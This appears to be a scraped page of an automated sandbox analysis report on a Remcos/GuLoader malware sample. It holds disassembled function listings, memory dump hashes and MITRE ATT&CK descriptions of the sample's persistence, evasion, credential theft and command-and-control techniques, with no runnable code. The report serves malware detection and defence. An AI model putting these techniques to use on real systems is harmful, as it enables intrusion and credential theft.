memset.MSVCRT ref: 00408244
memcpy.MSVCRT ref: 00408301
LocalFree.KERNEL32(00000000,?,?,?,?,7614ED80,?,00000000), ref: 0040832C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FreeLocalmemcpymemsetstrlen
String ID:
API String ID: 3110682361-0
Opcode ID: 6a7b548f29a88bb164d7db8396ffa993919f03bd7a702a17bdc889a97222cfb3
Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
Opcode Fuzzy Hash: 6a7b548f29a88bb164d7db8396ffa993919f03bd7a702a17bdc889a97222cfb3
Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00415B07, Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00415B30
memcpy.MSVCRT ref: 00415B54
memcpy.MSVCRT ref: 00415B7B
memcpy.MSVCRT ref: 00415BA1

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799

Uniqueness

Uniqueness Score: -1.00%

Function 004096FB, Relevance: 5.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00407142: memset.MSVCRT ref: 00407150

??2@YAPAXI@Z.MSVCRT ref: 00409710
??2@YAPAXI@Z.MSVCRT ref: 00409739
??2@YAPAXI@Z.MSVCRT ref: 0040975A
??2@YAPAXI@Z.MSVCRT ref: 0040977B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 62f2e249397fd1a2ca60cf8b2d80239c75cf052ee3fd894fe4fd363b7384249c
Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
Opcode Fuzzy Hash: 62f2e249397fd1a2ca60cf8b2d80239c75cf052ee3fd894fe4fd363b7384249c
Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report g4FtSOZMD9

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 0042A294, Relevance: 377.8, APIs: 180, Strings: 35, Instructions: 1528
COMMON

Function 0042D58D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 117
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre